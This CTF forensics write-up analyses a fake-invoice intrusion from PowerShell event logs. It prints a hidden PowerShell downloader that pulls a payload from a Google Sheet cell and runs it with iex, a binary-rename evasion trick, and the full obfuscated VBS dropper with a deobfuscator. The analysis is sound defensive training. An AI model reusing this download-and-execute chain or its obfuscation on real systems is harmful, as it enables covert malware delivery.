Scripts and Formulas
This is a forensics challenge from HTB Business CTF 2023. We are given event logs from a clerk’s computer along with a malicious invoice, and tasked with reconstructing the intrusion. The challenge scenario:
After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, the UNZ hired a local geologist to examine possible sites that were used in the past for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. Being new to the job, the clerk wasn’t aware of the past situation and opened the Invoice. Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! Given some Logs from the Clerk’s Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access!
The remote service that validates the answers presents the same scenario in a banner:
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Scripts and Formulas | After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, |
| | the UNZ hired a local geologist to examine possible sites that were used in the past |
| | for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, |
| | he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. |
| | Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. |
| | Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! |
| | Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
Files
Download: forensics_scripts_and_formulas.zip
Recon
The key artifact is Microsoft Windows Powershell Operational.evtx, which records the PowerShell that actually executed. The malicious activity can be recovered two ways: by parsing the event logs (the exploit ran on the clerk's machine, so its script blocks are captured there), or, once the Google Sheet ID is known, by opening the sheet directly: create a new sheet and substitute the recovered ID into its URL.
To make the EVTX data searchable, we dump every event log to XML. This converts the binary EVTX format into plaintext we can grep through.
find . -name '*.evtx' -exec evtx_dump.py '{}' \; > decoded.xml
Examining the Invoice Shortcut
The lure is a Windows shortcut (.lnk) disguised as an invoice. Running strings on it reveals the embedded target: the shortcut launches powershell.exe, while the WordPad path stored alongside it is there to make the shortcut pass for a document.
strings Invoice_01.lnk
/C:\
Windows
V=_.
System32
VD`.
WindowsPowerShell
v1.0
powershell.exe
VA_.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
%ProgramFiles%\Windows NT\Accessories\wordpad.exe
maltemple
1SPS
1SPS
Tracing PowerShell Execution in the Logs
Grepping the decoded XML for powershell.exe surfaces the AppIDs, the calling process, and — most importantly — two HostApplication command lines that capture the full attack chain.
cat decoded.xml | grep 'powershell.exe' | sort -u
<Data Name="AppID">{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="AppID">{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="CallingProcess">powershell.exe</Data>
HostApplication=C:\windows\system32\windowspowershell\v1.0\powershell.exe -ep bypass -w hidden -c $url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs
The second HostApplication line is the initial stage: it copies the legitimate cscript.exe to calc.exe (a defense-evasion rename) and uses that renamed binary to run Invoice.vbs. Its flags -Nop -sta -noni -w hidden load no profile, use a single-threaded apartment, run non-interactively and hide the window. So the program being copied/renamed is cscript.exe:calc.exe, and the program used to execute the next stage is powershell.exe.
Decoding the Stage-2 URL
The first HostApplication line base64-decodes a URL, fetches it with Invoke-RestMethod, and pulls a payload out of a Google Sheet cell. Decoding the base64 blob reveals the Google Sheets API endpoint, including the spreadsheet ID and the exact cell that holds the payload.
echo -n 'aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=' | base64 -d
https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ?key=AIzaSyDUpjSf7R1l1dQohA5Qv9EdyWA3KBOMc0U&ranges=Sheet1!O37&includeGridData=true
This confirms the spreadsheet ID is 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ and the payload lives in Sheet1 cell O37. The PowerShell then base64-decodes that cell value, decompresses it with a DeflateStream, and pipes the result to iex (Invoke-Expression).
VBA Analysis
Before the PowerShell stage runs, the Invoice.vbs script orchestrates the first stage. We analyze it with olevba to deobfuscate and decode the embedded strings.
python3 /opt/gits/oletools/oletools/olevba3.py --deobf --decode ./invoice.vbs
/opt/gits/oletools/oletools/olevba3.py:7: DeprecationWarning: olevba3 is deprecated, olevba should be used instead.
warnings.warn('olevba3 is deprecated, olevba should be used instead.', DeprecationWarning)
olevba 0.60.2dev1 on Python 3.11.4 - http://decalage.info/python/oletools
===============================================================================
FILE: ./invoice.vbs
Type: Text
-------------------------------------------------------------------------------
VBA MACRO ./invoice.vbs
in file: ./invoice.vbs - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM The great power of VBA programming in Office is that nearly every operation that you can perform with a mouse, keyboard, or a dialog box can also be automated by using VBA. Further, if it can be done once with VBA, it can be done just as easily a hundred times. In fact, the automation of repetitive tasks is one of the most common uses of VBA in Office.
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
End Function
REM Beyond the power of scripting VBA to accelerate every-day tasks, you can use VBA to add new functionality to Office applications or to prompt and interact with the user of your documents in ways that are specific to your business needs. For example, you could write some VBA code that displays a pop up message that reminds users to save a document to a particular network drive the first time they try to save it.
REM This code example shows how to take data from a worksheet and create a table of contents in an HTML file. The worksheet should have data in columns A, B, and C that correspond to the first, second, and third levels of the table of contents hierarchy. The HTML file is stored in the same working folder as the active workbook.
REM crucial for professionals across various industries. Microsoft Office, the go-to suite of productivity tools, offers a wealth of features and functionalities to enhance efficiency. However, many users are unaware of the hidden gem within Office: Visual Basic for Applications (VBA). This versatile programming language empowers users to automate tasks, customize applications, and unleash the full potential of Microsoft Office.
REM Excel, with its powerful data analysis capabilities, is a staple tool for professionals dealing with spreadsheets and calculations. VBA allows users to automate complex operations, manipulate data, and create custom functions to meet specific needs. By writing VBA code, users can streamline repetitive tasks like data entry, report generation, and data formatting. The ability to record and edit macros further simplifies the automation process, making it accessible to users without extensive programming knowledge.
REM Microsoft Word is widely used for creating documents, reports, and templates. With VBA, users can extend Word's functionality beyond its native features. VBA enables the creation of custom toolbars, buttons, and shortcuts to access frequently used commands. Users can also automate document creation by generating personalized letters, merging data from external sources, and performing advanced text manipulations. VBA provides a vast array of possibilities for automating workflows and enhancing document management.
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM Visual Basic for Applications (VBA) is a powerful tool that unlocks the true potential of Microsoft Office. By enabling automation, customization, and streamlining workflows, VBA empowers users to work more efficiently and effectively with Excel, Word, PowerPoint, Access, and Outlook. With its versatility and extensive capabilities, VBA provides professionals with a means to save time, reduce errors, and accomplish more in their day-to-day tasks. Embracing VBA can transform Microsoft Office into a tailored and automated productivity suite, revolutionizing the way we work.
REM VBA can transform PowerPoint into a dynamic presentation tool. Users can leverage VBA to automate the creation of slideshows, generate charts and graphs, and add interactive elements to engage the audience. By utilizing VBA, professionals can reduce the time spent on repetitive tasks such as formatting slides, applying consistent styles, and inserting multimedia content. With the ability to programmatically control every aspect of a presentation, VBA empowers users to deliver impactful and visually stunning presentations.
Function LLdunAaXwVgKfowf(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function
REM VBA extends the capabilities of Microsoft Access and Outlook, allowing users to build powerful databases and automate email communication. In Access, VBA enables the creation of custom forms, reports, and queries, facilitating efficient data management. For Outlook, VBA offers the ability to automate email processing, organize messages into folders, and perform advanced filtering. By leveraging VBA, users can customize these applications to suit their specific needs, increasing productivity and efficiency.
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|write |May write to a file (if combined with Open) |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|create |May execute file or a system command through |
| | |WMI |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA obfuscated |VBA string expressions were detected, may be |
| |Strings |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://sheets.googl|URL (obfuscation: Base64) |
| |eapis.com/v4/spreads| |
| |heets/1HpB4GqqYwI6X7| |
| |1z4p2EK88FoJjrsW2DKb| |
| |Skx-ro5lQQ?key=AIzaS| |
| |yDUpjSf7R1l1dQohA5Qv| |
| |9EdyWA3KBOMc0U&range| |
| |s=Sheet1 | |
|Base64 |https://sheets.googl|aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc|
|String |eapis.com/v4/spreads|3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSz|
| |heets/1HpB4GqqYwI6X7|g4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3l|
| |1z4p2EK88FoJjrsW2DKb|EVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUm|
| |Skx-ro5lQQ?key=AIzaS|cmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhP|
| |yDUpjSf7R1l1dQohA5Qv|XRydWU= |
| |9EdyWA3KBOMc0U&range| |
| |s=Sheet1!O37&include| |
| |GridData=true | |
|VBA string|BcV:L\XwFiInDdDoXw7s|("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32"|
| |1\9sNy4sIt9eGm32 | |
|VBA string|V312I\OwFiPnDdJo0wVs|("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\E|
| |Dp7oFw7e6r5sBhCeTl1l|v81IU04") & "1.0" |
| |B\Ev81IU041.0 | |
|VBA string|EK-MMe4RpHW |("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT |
| |JIb9FyG7pSZaQ6s56sYB|OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) |
| |IN-4XwMT | |
| |OThL2i64dSGdEXe0CnNE| |
| |9Q-X6c4V " | |
|VBA string|M0F$BWQuEKRrCBAlAY9 |("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4|
| |1JQ=65V QTL[KTCsEMKy|sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn|
| |RE4sTJ3tMY0eQAVmF9E.|5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZ|
| |60Qt7KEeZTUxXD6t0LC.|MUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM9|
| |CF9eXAWn5HDcGMSoZOFd|5nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCV|
| |T2KiCQ3n0KNgFUN]5YP:|cE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616r|
| |3PY:BLLaQ2VsZMUcJAYi|SKCoFKXmMKAb3X9aGMSsWO4e") & "64" |
| |4MXiKCX.4I8gY2Ae0YIt| |
| |JYKsU8MtLZ9rMUZiM95n| |
| |JH4gTDX(HZP[H4RsWZ7y| |
| |OCKsMX2tNWIe02ZmOH8.| |
| |BCVcE9SoAXHnP9QvDXJe| |
| |3CJrD51t2LE]C2L:0M2:| |
| |I66f616rSKCoFKXmMKAb| |
| |3X9aGMSsWO4e64 | |
|VBA string|E1sFUtLBrDIiTXn9NgZG|("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9|
| |(ED'88aHR0cHM6Ly9zaG|zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hl|
| |VldHMuZ29vZ2xlYXBpcy|ZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzV|
| |5jb20vdjQvc3ByZWFkc2|zJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3Uj|
| |hlZXRzLzFIcEI0R3FxWX|FsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVN|
| |dJNlg3MXo0cDJFSzg4Rm|oZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" |
| |9KanJzVzJES2JTa3gtcm| |
| |81bFFRP2tleT1BSXphU3| |
| |lEVXBqU2Y3UjFsMWRRb2| |
| |hBNVF2OUVkeVdBM0tCT0| |
| |1jMFUmcmFuZ2VzPVNoZW| |
| |V0MSFPMzcmaW5jbHVkZU| |
| |dyaWREYXRhPXRydWU= | |
|VBA string|;VQI$WN2pV0XaRDAyTQD|(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C |
| |lB8RoMOWaMQ9d71C |I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8|
| |I1G=XC1 JBM$XOFrSGBe|VNePHVtZ8RsMS5[") & "0" |
| |L3Qs7HNp9ZG.DH0sOC1h| |
| |Q15e8VNePHVtZ8RsMS5[| |
| |0 | |
|VBA string|7010HGS]F6H.JTWdB0Na|("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" |
| |3CHtT27aW5W[0 | |
|VBA string|7Z10CS0]V4E.9H0rRO1o|("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" |
| |HJEwD | |
|VBA string|YP7aQTYtE3UaYLX[0 |("YP7aQTYtE3UaYLX[") & "0" |
|VBA string|OPI0J12]JUK.TK7v7J0a|("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") |
| |RTGl9B2uFO7eV11sOEC[|& "0" |
| |0 | |
|VBA string|VKB0X4U]VO2.ZMIf4FIo|("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3J|
| |D02r82Mm5NNaNIVt2Z4t|eYWLd") & "V" |
| |H3JeYWLdV | |
|VBA string|F2aESlKEuR0e5Y;R4$UA|("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW |
| |dZIeBIcL5o51dPXeEW |CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEe|
| |CK=4Q LS[M8sYHyE3s82|OWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") &|
| |t6YeAXmB2.12cXZo2PnZ|"64" |
| |KvYEeOWrK9tQN]YQ:QQ:| |
| |RZfK6rJIoQVmRRbBUa6R| |
| |sHOeUZ64 | |
|VBA string|6934MPsZAt50rIFiUYn6|("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9o|
| |Sg46(HG$JFpE7aNAyVHl|H0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM- |
| |L9oH0aQNdUX)VA;XK$YE|SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7Gi|
| |mM4s59 87=PT |I5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;|
| |FHnETe61wYM- |YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDo|
| |SYo5Bb6VjHPe3DcHQtET|BAd3HeXL,") & "0" |
| |7SsQ0yIKs6Pt71eBTmJQ| |
| |.7GiI5oT4.SDmUQeVDmA| |
| |MoRZrUGyGAsG1tK7rM9e| |
| |PMaUQmTT;YF$Z1mWTsIZ| |
| |.5Ww4CrBZi1CtCNeTU(W| |
| |0$0LdFXe2HcDDoBAd3He| |
| |XL,0 | |
|VBA string|Q8Z,409 12M$S2Zd5JAe|("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RY|
| |VHYc6DNoEOCdEZZeOVB.|lTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.|
| |9RYlTD3eP6HnB29g1VYt|I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S")|
| |HC2hHIN)FND;20Z$KJ5m|& "0" |
| |JZYsFHJ.I28p0VYo48Gs| |
| |1V9i91DtEPNiLLUoP49n| |
| |000 DC8=F7S0 | |
|VBA string|1;2$Fs1rV C=W |("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsI|
| |Dn8e7wB- |tQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1w|
| |YoMbAjXeIc4tY SsFyAs|I-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8|
| |ItQeNmI.8iQoY.WsGt2r|rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$|
| |Be5aDm3rReEaBdPeArR(|NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sM|
| |1nCe1wI- |sBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:|
| |RoPbMjNeDcWt6 BsJy7s|IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$O|
| |Nt2eEm5.SiZoQ.JcKoMm|sBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVs|
| |Yp8rWeDs6sZiWoRn0.Td|EeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaS|
| |Pe8f6lIaYtJeXsBt2rDe|LGtSPXa") & "|iex" & Chr(34) |
| |HaNmF(3$NmRsO,7 M[As| |
| |QyPsKt9e7mR.Hi5oD.Wc| |
| |EoNmDp5rRe8sMsBi4oMn| |
| |1.8cLoSmQpPrHeIsCsJi| |
| |2oMnEmHo5dCeA]6:X:Id| |
| |EeMcRoQmLpGr1eIs4sY)| |
| |T)F;A$Md7aDtXaM F=B | |
| |W$OsBrH.CrWeWaVdKtXo| |
| |2eAnAd1(P)E;K$Gs7r2.| |
| |2cYlZoVsEeM(O)0;I$Tm| |
| |0sB.YcHlNoXs6eO(P)0;| |
| |IWP$TIVd5MUaSLGtSPXa| |
| ||iex" | |
+----------+--------------------+---------------------------------------------+
The deobfuscation function in this VBS script is LLdunAaXwVgKfowf. It iterates over each character of its input and keeps only the characters that LCase leaves unchanged and that are not numeric: lowercase letters survive, and so do punctuation, backslashes and spaces, while the uppercase letters and digits that pad each string are dropped. We can see it being used to rebuild the path to powershell.exe and the full -c ... |iex command:
LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
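To make the filter concrete, here is an added Python re-implementation of LLdunAaXwVgKfowf applied to the fragments above. This is example code written for this writeup, not the challenge author's; the function names vbs_deobfuscate, rebuild, recover_powershell_path and recover_flags are my own, and the obfuscated fragments are copied from the decoded script shown above.

```python
"""Python re-implementation of the string filter used by LLdunAaXwVgKfowf.

Added example for this writeup, not the challenge author's code. A character
survives the VBS filter when LCase(ch) = ch and IsNumeric(ch) is False, so
lowercase letters, punctuation, backslashes and spaces are kept while the
uppercase letters and digits that pad each string are dropped. The fragments
below are copied from the decoded Invoice.vbs shown on this page.
"""


def vbs_deobfuscate(text: str) -> str:
    """Keep each character that LCase leaves unchanged and that is not a digit."""
    return "".join(c for c in text if c == c.lower() and not c.isdigit())


def rebuild(parts) -> str:
    """Mirror the VBS concatenation: (fragment, True) is run through the
    filter, (fragment, False) is a literal the script appends with & as-is."""
    return "".join(vbs_deobfuscate(s) if obf else s for s, obf in parts)


# The expression that builds yNSlalZeGAsokjsP in the decoded script.
POWERSHELL_PATH_PARTS = [
    (r"BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm", True),
    ("32", False),
    (r"V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04", True),
    ("1.0", False),
    (r"\9pMoBw7eTrMsDhKeVlOl1.WeMxUe", True),
]

# The first filtered fragment of cMtARTHTmbqbxauA, i.e. the PowerShell flags.
FLAGS_FRAGMENT = "EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V "


def recover_powershell_path() -> str:
    """Returns the interpreter path the script runs (compare the HostApplication line)."""
    return rebuild(POWERSHELL_PATH_PARTS)


def recover_flags() -> str:
    """Returns the flag string that precedes the quoted -c command."""
    return vbs_deobfuscate(FLAGS_FRAGMENT)


if __name__ == "__main__":
    print(recover_powershell_path())
    print(repr(recover_flags()))
```

The VBS version also leaves slot 0 of its ReDim'd array Empty, which contributes nothing to the concatenation, so iterating the actual characters is equivalent. Running the block prints the lowercase powershell.exe path and the string -ep bypass -w hidden -c, which is exactly the command prefix recorded in the first HostApplication line.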
Powershell Runtime
The PowerShell Operational log captures script block logging under Event ID 4104, which records the actual deobfuscated script blocks as they execute. The first relevant 4104 event is the stage-2 downloader that fetches the Google Sheet payload and pipes it to iex.
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:23.795862"></TimeCreated>
<EventRecordID>78</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0002-a13f-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
